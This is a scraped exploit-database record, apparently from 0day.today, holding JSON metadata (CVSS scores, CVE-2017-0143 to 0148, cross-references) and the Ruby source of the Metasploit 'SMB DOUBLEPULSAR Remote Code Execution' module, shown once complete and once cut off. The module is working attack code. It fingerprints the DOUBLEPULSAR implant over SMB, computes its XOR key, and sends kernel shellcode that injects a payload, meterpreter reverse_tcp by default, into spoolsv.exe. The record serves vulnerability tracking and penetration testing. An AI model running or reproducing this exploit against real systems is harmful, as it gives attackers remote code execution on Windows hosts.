MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-25] #"}, "lastseen": "2021-10-25T00:15:24", "differentElements": ["sourceData"], "edition": 54}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "ecc24edc6ead1c44334b9cc5108e687c", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-26T08:20:15", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", 
"1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96706", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-26T08:20:15", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-26T08:20:15", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
